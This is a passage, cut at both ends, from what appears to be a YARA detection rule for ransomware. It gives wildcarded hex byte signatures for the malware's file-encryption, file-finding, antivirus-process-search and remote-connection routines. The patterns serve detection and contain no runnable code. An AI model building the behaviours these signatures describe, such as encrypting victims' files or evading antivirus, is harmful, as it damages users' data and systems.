- 44 24 ?? ?? 74 ?? 85 DB 74 ?? BA ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? - ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 8B 54 24 ?? 8B CE E8 ?? ?? ?? ?? EB ?? 68 ?? ?? - ?? ?? 56 FF 15 ?? ?? ?? ?? 57 EB ?? FF 74 24 ?? 8D 54 24 ?? 8B CE E8 ?? ?? ?? ?? 59 - 8B 44 24 ?? 33 C9 66 89 08 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 - ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 8B C7 5F 5E - 5B 8B E5 5D C3 - } - $crypt_files_v4_1_2 = { - 55 8B EC 81 EC ?? ?? ?? ?? 53 56 89 4D ?? 33 DB 57 B9 ?? ?? ?? ?? 89 5D ?? 8B F2 E8 - ?? ?? ?? ?? 8B F8 8D 55 ?? 56 57 8D 4D ?? 89 7D ?? E8 ?? ?? ?? ?? 59 59 85 C0 0F 84 - ?? ?? ?? ?? 53 53 6A ?? 53 53 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B F0 83 FE - ?? 0F 84 ?? ?? ?? ?? 6A ?? 58 88 5D ?? 48 75 ?? 51 51 8D 55 ?? 8D 8D ?? ?? ?? ?? E8 - ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 89 45 ?? B9 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 89 5D ?? 89 - 5D ?? E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 89 45 ?? E8 ?? ?? ?? ?? 89 45 ?? 89 5D ?? 53 8D - 45 ?? 50 68 ?? ?? ?? ?? FF 75 ?? 56 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 4D - ?? 85 C9 0F 84 ?? ?? ?? ?? 8B 45 ?? 81 F9 ?? ?? ?? ?? 6A ?? 5A 0F 42 C2 01 8F ?? ?? - ?? ?? 8B 55 ?? 8D 8D ?? ?? ?? ?? 11 9F ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 50 FF 75 ?? 89 - 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 59 59 33 C9 F7 D8 41 99 51 53 52 50 56 FF 15 ?? ?? ?? - ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 53 8D 45 ?? 50 FF 75 ?? FF 75 ?? 56 FF 15 ?? ?? ?? - ?? 85 C0 75 ?? 8B 7D ?? 6A ?? FF 15 ?? ?? ?? ?? 53 8D 45 ?? 50 FF 75 ?? 57 56 FF 15 - ?? ?? ?? ?? 85 C0 74 ?? 8B 7D ?? 8B 4D ?? 85 C9 0F 84 ?? ?? ?? ?? 53 8D 45 ?? 50 68 - ?? ?? ?? ?? 57 56 FF 15 ?? ?? ?? ?? 8B 4D ?? 8B D8 E8 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? - ?? ?? 56 FF 15 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 5F 5E 8B C3 5B 8B E5 5D C3 33 C0 8D - 48 ?? 89 4D ?? EB - } - $remote_connection_v4_1_2 = { - 55 8B EC 83 EC ?? 53 8B 1D ?? ?? ?? ?? 56 8B F1 57 83 7E ?? ?? 74 ?? FF 76 ?? FF D3 - 8B CE E8 ?? ?? ?? ?? 33 FF 57 57 6A ?? 57 57 FF 75 ?? FF 75 ?? FF 76 ?? FF 15 ?? ?? - ?? ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? - ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 75 ?? 8B F0 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? - 83 C4 ?? B8 ?? ?? ?? ?? 81 7D ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 0F 44 C8 57 51 57 57 68 - ?? ?? ?? ?? 56 8B 75 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 74 ?? FF - 75 ?? FF 75 ?? FF 75 ?? FF 75 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 33 FF 47 EB ?? FF - 15 ?? ?? ?? ?? 8B 45 ?? 50 FF D3 56 FF D3 8D 4D ?? E8 ?? ?? ?? ?? 8B C7 5F 5E 5B 8B - E5 5D C2 - } - $url_parameters_setup_v4_1_2 = { - 55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 FF 15 ?? ?? ?? ?? 33 FF 57 57 57 FF 15 ?? ?? ?? - ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ?? 57 FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 - ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? - ?? ?? ?? 83 EC ?? 33 DB 43 53 83 EC ?? 53 51 53 51 53 51 53 51 53 83 EC ?? 53 51 53 - 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? - E8 ?? ?? ?? ?? 8D 0C 45 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 85 C0 74 ?? 50 8D - 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF - D6 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF D6 68 - ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF D6 68 ?? ?? - ?? ?? FF 35 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF D6 FF 35 ?? ?? ?? - ?? 8B 35 ?? ?? ?? ?? FF D6 FF 35 ?? ?? ?? ?? 03 C0 A3 ?? ?? ?? ?? FF D6 03 C0 8B D0 - E8 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 57 57 57 68 ?? ?? ?? ?? 57 57 FF 15 ?? ?? ?? ?? - 8B 35 ?? ?? ?? ?? 8B F8 68 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF D6 BB ?? ?? ?? ?? 53 - FF D6 E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 53 FF D6 68 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? - FF D6 E8 ?? ?? ?? ?? 85 FF 74 ?? 6A ?? 57 FF 15 ?? ?? ?? ?? E8 - } - $url_parameters_setup_v4 = { - 55 8B EC 81 EC ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? - FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ?? 6A ?? FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 - ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 50 FF - 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? - ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 - ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 - ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 - ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 - ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 - ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 89 45 ?? E8 ?? ?? ?? ?? 8D 8D ?? - ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 04 45 ?? ?? ?? ?? 50 6A ?? FF 15 ?? - ?? ?? ?? A3 ?? ?? ?? ?? 85 C0 75 ?? 50 FF 15 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? - ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF - 35 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF 35 ?? - ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF 35 ?? ?? ?? - ?? FF D6 FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 03 C0 8B D0 E8 ?? ?? ?? ?? 6A ?? FF 15 - ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF D6 68 ?? ?? ?? - ?? FF D6 E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF D6 - 68 ?? ?? ?? ?? FF D6 E8 ?? ?? ?? ?? E8 - } - $search_antivirus_processes_v4 = { - 55 8B EC 83 EC ?? 53 56 8B 35 ?? ?? ?? ?? 57 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A - ?? FF D6 8B 5D ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 89 03 C7 45 ?? ?? ?? ?? ?? C7 45 - ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 - ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 - ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 - ?? ?? ?? ?? ?? FF D6 8B F8 89 7D ?? 85 FF 74 ?? 6A ?? 6A ?? C7 07 ?? ?? ?? ?? FF 15 - ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 75 ?? 68 ?? ?? ?? ?? 6A ?? 57 FF 15 ?? ?? ?? ?? 5F 5E - 33 C0 5B 8B E5 5D C2 ?? ?? 33 C9 33 F6 57 50 89 4D ?? 89 4D ?? 89 4D ?? 89 75 ?? FF - 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 49 ?? 85 F6 0F 85 ?? ?? ?? ?? 83 C7 ?? EB - ?? 8D 49 ?? 57 FF 74 B5 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 46 83 FE ?? 72 ?? 8B 75 ?? - EB ?? 83 7D ?? ?? 57 FF 33 C7 45 ?? ?? ?? ?? ?? 75 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? - ?? FF 33 FF 15 ?? ?? ?? ?? EB ?? 8B 35 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF 33 FF D6 - FF 45 ?? 57 FF 15 ?? ?? ?? ?? 8B 4D ?? 8B 75 ?? 8D 0C 41 B8 ?? ?? ?? ?? 81 F9 ?? ?? - ?? ?? 89 4D ?? 0F 47 F0 89 75 ?? 8B 7D ?? 57 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? - FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 03 66 83 38 ?? 74 - ?? 50 FF 15 ?? ?? ?? ?? 8B 0B 33 D2 66 89 54 41 ?? 8B 45 ?? 8B 4D ?? 89 08 8B 35 ?? - ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 57 FF D6 FF 75 ?? FF 15 ?? ?? ?? ?? 8B 7D ?? 85 FF 75 - ?? 68 ?? ?? ?? ?? 57 FF 33 FF D6 8B C7 5F 5E 5B 8B E5 5D C2 - } - $find_files_v4 = { - C7 44 24 ?? ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 C0 75 ?? 66 83 3E ?? 0F 84 ?? ?? ?? - ?? 8D 54 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 83 7C 24 ?? ?? 89 44 24 - ?? 0F 85 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 8D 04 - 46 89 44 24 ?? FF D7 8D 44 24 ?? 50 56 FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 33 D2 89 44 24 - ?? 66 89 11 83 F8 ?? 75 ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? 5F 5E 5B 8B - E5 5D C3 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 - ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 44 24 ?? 50 56 FF D7 F6 - 44 24 ?? ?? 74 ?? 83 7C 24 ?? ?? 74 ?? BA ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 C0 74 - ?? 68 ?? ?? ?? ?? 56 FF D7 6A ?? 8B D3 8B CE E8 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? 56 - FF D7 6A ?? 8B D3 8B CE E8 ?? ?? ?? ?? EB ?? 53 8D 54 24 ?? 8B CE E8 ?? ?? ?? ?? 83 - C4 ?? 8B 44 24 ?? 33 C9 66 89 08 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 - 0F 85 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 5F 5E - 33 C0 5B 8B E5 5D C3 - } - $crypt_files_v4 = { - 55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 6A ?? 68 ?? ?? ?? ?? 33 DB 89 4D ?? 68 ?? ?? ?? - ?? 53 8B F2 89 5D ?? FF 15 ?? ?? ?? ?? 8B F8 8D 55 ?? 56 57 8D 4D ?? 89 7D ?? E8 ?? - ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 33 C0 5F 5E 5B - 8B E5 5D C3 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? - 8B F0 83 FE ?? 0F 84 ?? ?? ?? ?? B8 ?? ?? ?? ?? 88 5D ?? 48 75 ?? 8B 45 ?? 89 85 ?? - ?? ?? ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 89 45 ?? 8B - 45 ?? 89 45 ?? 8B 45 ?? 6A ?? 89 45 ?? 8B 45 ?? 68 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 68 - ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 89 5D ?? 89 5D ?? 8B 1D ?? ?? ?? ?? 6A ?? C7 05 ?? ?? - ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? - ?? ?? C7 45 ?? ?? ?? ?? ?? 89 45 ?? FF D3 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? - 89 45 ?? FF D3 33 C9 8B D8 89 4D ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? FF 75 ?? 56 FF - 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 4D ?? 3D - ?? ?? ?? ?? BA ?? ?? ?? ?? 0F 42 CA 01 87 ?? ?? ?? ?? 8B 55 ?? 83 97 ?? ?? ?? ?? ?? - 8B 7D ?? 89 4D ?? 8D 8D ?? ?? ?? ?? 57 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B C7 F7 D8 99 6A - ?? 6A ?? 52 50 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 - 57 53 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 57 - 53 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 4D ?? 8B 7D ?? 85 C9 0F 84 ?? ?? ?? ?? 6A ?? - 8D 45 ?? 50 68 ?? ?? ?? ?? 57 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 75 ?? 89 - 45 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? - ?? 8B 5D ?? 68 ?? ?? ?? ?? 6A ?? 57 FF 15 ?? ?? ?? ?? 5F 5E 8B C3 5B 8B E5 5D C3 - } - $crypt_files_v3 = { - 55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 45 ?? C7 45 - ?? ?? ?? ?? ?? 50 6A ?? 8B D9 8B CA 6A ?? E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 6A ?? 68 - ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF D6 8B F8 C7 45 ?? ?? ?? ?? ?? 53 57 89 7D ?? C7 - 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 45 ?? 50 57 FF 15 ?? ?? - ?? ?? 66 0F 6F 05 ?? ?? ?? ?? BA ?? ?? ?? ?? F3 0F 7F 85 ?? ?? ?? ?? 51 66 0F 6F 05 - ?? ?? ?? ?? 8D 4D ?? F3 0F 7F 45 ?? C6 45 ?? ?? 66 0F 6F 05 ?? ?? ?? ?? F3 0F 7F 45 - ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 - ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF D6 F3 0F 6F 85 ?? ?? ?? ?? 8B F8 6A ?? 68 ?? ?? - ?? ?? 68 ?? ?? ?? ?? F3 0F 7F 07 6A ?? F3 0F 6F 45 ?? 89 7D ?? F3 0F 7F 47 ?? FF D6 - F3 0F 6F 45 ?? 68 ?? ?? ?? ?? 89 45 ?? F3 0F 7F 00 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 - 57 FF 75 ?? C7 45 ?? ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 83 C4 ?? - 85 C0 75 ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? EB ?? 68 ?? - ?? ?? ?? 8D 45 ?? 50 FF 75 ?? FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? - FF 15 ?? ?? ?? ?? 0F 57 C0 66 0F 13 45 ?? 8B 75 ?? 8B 5D ?? E9 ?? ?? ?? ?? 8D 85 ?? - ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? - 6A ?? 6A ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 75 ?? 68 ?? ?? ?? - ?? 6A ?? FF 75 ?? FF D7 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF D7 0F 57 C0 66 0F 13 45 ?? - 8B 75 ?? 8B 5D ?? E9 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? FF D6 6A ?? 8B D8 - 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? C7 03 ?? ?? ?? ?? C7 43 ?? ?? ?? ?? ?? FF D6 8B - 3D ?? ?? ?? ?? 33 F6 33 C9 89 45 ?? 89 4D ?? EB ?? 8B 45 ?? 6A ?? 8D 4D ?? 51 68 ?? - ?? ?? ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84 - ?? ?? ?? ?? 3D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? - 0F 42 F1 01 03 83 53 ?? ?? 8B 45 ?? 89 45 ?? 89 45 ?? A8 ?? 74 ?? 8B FF 40 A8 ?? 75 - ?? 89 45 ?? 6A ?? 68 ?? ?? ?? ?? 50 6A ?? FF 15 ?? ?? ?? ?? FF 75 ?? 89 45 ?? FF 75 - ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 89 45 ?? 6A ?? 68 ?? ?? ?? ?? 50 6A ?? FF 15 - ?? ?? ?? ?? 85 C0 74 ?? 8B 55 ?? 8B 4D ?? 50 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 8D 45 - ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF D7 8B 4D ?? 8B 45 ?? - F7 D9 6A ?? 83 D0 ?? 6A ?? F7 D8 50 51 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 - ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? FF 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75 - ?? BE ?? ?? ?? ?? 89 75 ?? 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF D7 85 F6 0F 84 ?? ?? ?? - ?? 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF D7 8B 4D ?? 8B 75 ?? 85 C9 75 ?? 51 8D 45 ?? 50 - 68 ?? ?? ?? ?? FF 75 ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? FF 75 - ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 6A ?? 53 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? - ?? ?? ?? 8B 03 8B 73 ?? 68 ?? ?? ?? ?? 6A ?? 53 89 45 ?? FF D7 68 ?? ?? ?? ?? 6A ?? - FF 75 ?? FF D7 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF D7 8B 5D ?? 68 ?? ?? ?? ?? 6A ?? FF - 75 ?? FF D7 5F 8B D6 8B C3 5E 5B 8B E5 5D C3 - } - $search_antivirus_processes_v5 = { - 8B 7D ?? 6A ?? 53 6A ?? 33 DB 89 07 53 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 - 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 - 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 - 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF - D6 8B F0 85 F6 75 ?? 33 C0 E9 ?? ?? ?? ?? 53 6A ?? C7 06 ?? ?? ?? ?? FF 15 ?? ?? ?? - ?? 89 45 ?? 83 F8 ?? 75 ?? 68 ?? ?? ?? ?? 53 56 FF 15 ?? ?? ?? ?? EB ?? 56 33 C9 89 - 5D ?? 50 89 5D ?? 89 4D ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 0F - 85 ?? ?? ?? ?? 33 C0 8D 4E ?? 89 45 ?? 51 FF 74 85 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? - 8B 45 ?? 8D 4E ?? 40 89 45 ?? 83 F8 ?? 72 ?? EB ?? 33 C0 39 45 ?? 8D 58 ?? 8D 46 ?? - 50 FF 37 75 ?? FF 15 ?? ?? ?? ?? EB ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 37 FF 15 - ?? ?? ?? ?? FF 45 ?? 8D 46 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 6A ?? 8D 0C 41 8B 45 ?? - 81 F9 ?? ?? ?? ?? 89 4D ?? 59 0F 47 C1 89 45 ?? 56 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 - 74 ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 85 DB 74 ?? 8B 07 33 C9 66 39 08 - 74 ?? 50 FF 15 ?? ?? ?? ?? 8B 0F 33 D2 66 89 54 41 ?? 8B 45 ?? 8B 4D ?? 89 08 68 ?? - ?? ?? ?? 33 C0 50 56 8B 35 ?? ?? ?? ?? FF D6 FF 75 ?? FF 15 ?? ?? ?? ?? 85 DB 75 ?? - 68 ?? ?? ?? ?? 33 C0 50 FF 37 FF D6 8B C3 5F 5E 5B 8B E5 5D C2 - } - $find_files_v5 = { - 55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 56 57 33 FF 89 54 24 ?? 8B F1 89 7C 24 ?? 39 - 7D ?? 75 ?? 8D 54 24 ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 85 C0 75 ?? 85 DB 75 ?? 33 C0 E9 - ?? ?? ?? ?? 33 DB 43 8B CE E8 ?? ?? ?? ?? 85 C0 75 ?? 66 83 3E ?? 74 ?? 8D 54 24 ?? - 89 7C 24 ?? 8B CE E8 ?? ?? ?? ?? 89 44 24 ?? 39 7C 24 ?? 75 ?? 56 FF 15 ?? ?? ?? ?? - 68 ?? ?? ?? ?? 56 8D 04 46 89 44 24 ?? FF 15 ?? ?? ?? ?? 6A ?? 57 57 8D 44 24 ?? 50 - 6A ?? 56 FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 33 D2 89 44 24 ?? 66 89 11 83 F8 ?? 75 ?? BF - ?? ?? ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 - ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 44 24 ?? 50 56 FF - 15 ?? ?? ?? ?? F6 44 24 ?? ?? 74 ?? 85 DB 74 ?? BA ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? - 85 C0 74 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 8B 54 24 ?? 8B CE E8 ?? ?? ?? - ?? EB ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 57 EB ?? FF 74 24 ?? 8D 54 24 ?? 8B CE - E8 ?? ?? ?? ?? 59 8B 44 24 ?? 33 C9 66 89 08 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ?? - ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? - ?? ?? 8B C7 5F 5E 5B 8B E5 5D C3 - } - $crypt_files_v5 = { - 55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 8B D9 89 55 ?? 33 FF 89 5D ?? 21 7D ?? B9 ?? ?? - ?? ?? 89 7D ?? E8 ?? ?? ?? ?? 8B F0 89 75 ?? 85 F6 75 ?? 33 C0 E9 ?? ?? ?? ?? FF 75 - ?? 8D 55 ?? 56 8D 4D ?? E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8B CE E8 ?? ?? ?? ?? EB ?? - 33 C0 50 68 ?? ?? ?? ?? 6A ?? 50 50 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B D8 83 FB - ?? 75 ?? 33 C0 50 68 ?? ?? ?? ?? 6A ?? 50 50 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? - ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? FF 70 ?? FF 70 ?? 6A ?? 6A ?? 53 FF 15 - ?? ?? ?? ?? 6A ?? 58 C6 45 ?? ?? 48 75 ?? 51 68 ?? ?? ?? ?? 8D 55 ?? 8D 8D ?? ?? ?? - ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 8B 8E ?? ?? ?? ?? 21 7D ?? 21 7D ?? 41 89 45 ?? - 8B 45 ?? 89 45 ?? E8 ?? ?? ?? ?? 8B 8E ?? ?? ?? ?? 83 C1 ?? 89 45 ?? E8 ?? ?? ?? ?? - 89 45 ?? 33 FF 